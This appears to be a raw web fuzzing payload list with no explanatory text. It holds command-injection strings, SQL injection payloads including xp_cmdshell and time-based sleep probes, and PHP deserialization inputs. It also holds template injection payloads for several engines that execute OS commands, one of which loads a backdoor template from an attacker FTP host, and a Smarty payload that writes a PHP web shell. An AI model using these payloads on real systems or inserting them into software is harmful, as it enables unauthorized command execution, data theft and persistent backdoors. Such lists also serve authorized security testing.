'
')
'))
')))
'))))
')))))
'))))))
')))))))
'))))))))
')))))))))
'}
'}}
'}}}
'}}}}
'}}}}}
'}}}}}}
'}}}}}}}
'}}}}}}}}
'}}}}}}}}}
']
']]
']]]
']]]]
']]]]]
']]]]]]
']]]]]]]
']]]]]]]]
']]]]]]]]]
"
")
"))
")))
"))))
")))))
"))))))
")))))))
"))))))))
")))))))))
"}
"}}
"}}}
"}}}}
"}}}}}
"}}}}}}
"}}}}}}}
"}}}}}}}}
"}}}}}}}}}
"]
"]]
"]]]
"]]]]
"]]]]]
"]]]]]]
"]]]]]]]
"]]]]]]]]
"]]]]]]]]]
`
`)
`))
`)))
`))))
`)))))
`))))))
`)))))))
`))))))))
`)))))))))
`}
`}}
`}}}
`}}}}
`}}}}}
`}}}}}}
`}}}}}}}
`}}}}}}}}
`}}}}}}}}}
`]
`]]
`]]]
`]]]]
`]]]]]
`]]]]]]
`]]]]]]]
`]]]]]]]]
`]]]]]]]]]
?>
%>
;?>
;%>
";?>
';?>
'%>
"%>
;
/>
'/>
"/>
|print id
|id
:print id
:id
;print id
;id
;|print id
;|id
!print id
!id
`id`
$(id)
${phpinfo();}
{${phpinfo();}}
`ls`
$(ls)
'$(ls)'
"$(ls)
'$(ls)
${system("ls")}
`system("pwd")`
{${system("pwd")}}
|id
||pwd
;&pwd
%s
%%s
%25s
desc;exec master.xp_cmdshell 'whoami>%TEMP%\SQL.txt'-- 
%64%65%73%63%3b%65%78%65%63%20%6d%61%73%74%65%72%2e%78%70%5f%63%6d%64%73%68%65%6c%6c%20%27%77%68%6f%61%6d%69%3e%25%54%45%4d%50%25%5c%53%51%4c%2e%74%78%74%27%2d%2d%20
user()--
,user()--
',user()--
",user()--
@@version--
,@@version#
,@@version--
',@@version--
",@@version--
sleep(10)
sleep(10)--
sleep(10)#
,sleep(10)--
',sleep(10)--
",sleep(10)--
-sleep(15)
-sleep(15)--
,-sleep(15)--
',sleep(15)--
",sleep(15)--
a:1:{i:0;O:9:"Exception":0:{}}
a:1:{i:0;i:1337;}
${7*7}
username<tag>
username}}<tag>
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
{{7*'7'}}
$class.inspect("java.lang.Runtime").type.getRuntime().exec("sleep 5").waitFor()
{{7*7}}
{{7*'7'}}
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{7*7}
{php}echo `id`;{/php}
a{*comment*}b
{self::getStreamVariable("file:///proc/self/loginuid")}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']);?>",self::clearConfig())}
=7*7
7*7
=root
root
<%import os;x=os.popen('id').read();%>${x}
${"z".join("ab")}
%00
%01
%02
%03
%04
%05
%06
%07
%08
%09
%0A
%0B
%0C
%0D
%0E
%0F
%10
%11
%12
%13
%14
%15
%16
%17
%18
%19
%1A
%1B
%1C
%1D
%1E
%1F
%20
%21
%22
%23
%24
%25
%26
%27
%28
%29
%2A
%2B
%2C
%2D
%2E
%2F
%30
%31
%32
%33
%34
%35
%36
%37
%38
%39
%3A
%3B
%3C
%3D
%3E
%3F
%40
%41
%42
%43
%44
%45
%46
%47
%48
%49
%4A
%4B
%4C
%4D
%4E
%4F
%50
%51
%52
%53
%54
%55
%56
%57
%58
%59
%5A
%5B
%5C
%5D
%5E
%5F
%60
%61
%62
%63
%64
%65
%66
%67
%68
%69
%6A
%6B
%6C
%6D
%6E
%6F
%70
%71
%72
%73
%74
%75
%76
%77
%78
%79
%7A
%7B
%7C
%7D
%7E
%7F%2527%252eid%28%29%2527%25%2e
%2527id%28%29%2527
